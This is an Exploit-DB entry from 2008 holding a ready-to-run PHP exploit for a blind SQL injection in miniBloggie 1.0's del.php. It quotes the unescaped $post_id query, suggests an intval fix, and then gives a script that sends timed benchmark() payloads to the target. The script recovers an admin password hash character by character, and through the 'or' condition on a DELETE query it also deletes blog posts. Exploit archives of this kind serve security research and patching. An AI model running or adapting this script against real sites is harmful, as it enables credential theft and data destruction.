miniBloggie 1.0 - 'del.php' Blind SQL Injection

EDB-ID:

6782

CVE:

2008-4628

EDB Verified:

Author:

StAkeR

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2008-10-18

Vulnerable App: 
#!/usr/bin/php 
<?php

error_reporting(0);


/*
   miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit
   ------------------------------------------------------------
   Author -> StAkeR aka athos - StAkeR[at]hotmail[dot]it
   Date   -> 18/10/2008
   Get    -> http://www.mywebland.com/dl.php?id=2
   ------------------------------------------------------------
   
   File del.php
   
   25. if (isset($_GET['post_id'])) $post_id = $_GET['post_id'];
   26. if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];
   27.
   28. if ($confirm=="") {   
   29. notice("Confirmation", "Warning : Do you want to delete this post ? <a href=del.php?post_id=".$post_id."&confirm=yes>Yes</a>");
   30. }
   31. elseif ($confirm=="yes") {
   32. // Data Base Connection  //
   33. dbConnect();
   34. $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
   35. $query = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error());
   36. $confirm ="";
   37. notice("Del Post", "Data Deleted");
   38. }
   39. else notice( "Delete Error, Unable to complete the task !" );
   40. ?>

   NOTE:
   
   $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
   
   $post_id isn't escaped so you can execute SQL Code 
   
   How to fix? sanize $post_id with intval or int (PHP Functions)
   
  
*/  



function get($host,$path,$evil)
{
  if(!preg_match('/\w:[0-9]/i',$host)) alert();
  $inet = explode(':',$host);

  if(!$sock = fsockopen($inet[0],$inet[1])) die('connection refused');
  
  $data .= "GET /$path/del.php?post_id={$evil}&confirm=yes HTTP/1.1\r\n";
  $data .= "Host: $host[0]\r\n";
  $data .= "User-Agent: Lynx (textmode)\r\n";
  $data .= "Connection: close\r\n\r\n";
  
  fputs($sock,$data);
  
  while(!feof($sock)) { $html .= fgets($sock); }
  fclose($sock);
  
  return $html;
}


function alert()
{
  echo "# miniBloggie 1.0 (del.php) Remote Blind SQL Injection Exploit\r\n";
  echo "# Usage: php {$argv[0]} [host:port] [path] [user_id]\r\n";
  echo "# Usage: php {$argv[0]} localhost:80 /minibloggie 1\r\n";
  die;
}


function charme($char,$colum,$id)
{
  $sql = "1 or (select if((ascii(substring(password".
         ",$colum,1))=$char),benchmark(200000000,char(0)),0)".
         " from blogusername where id=$id)#";
  
  return urlencode($sql);
}


$hash = array(0,48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
$c = 0;


for($i=0;$i<=32;$i++)
{
  for($j=0;$j<=17;$j++)
  {
    $start = time();
    
    get($argv[1],$argv[2],charme($hash[$j],$c,intval($argv[3])));
    
    $stop = time();
    
    if($stop - $start > 12)
    {
      $password .= chr($hash[$j]);
      $c++;;
      break;
    }
  }
}

if(isset($password))
{
  echo "# Hash: $password\r\n";
  die;
}
else
{
  echo "# Exploit Failed!\r\n";
}
    



?>

# milw0rm.com [2008-10-18]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services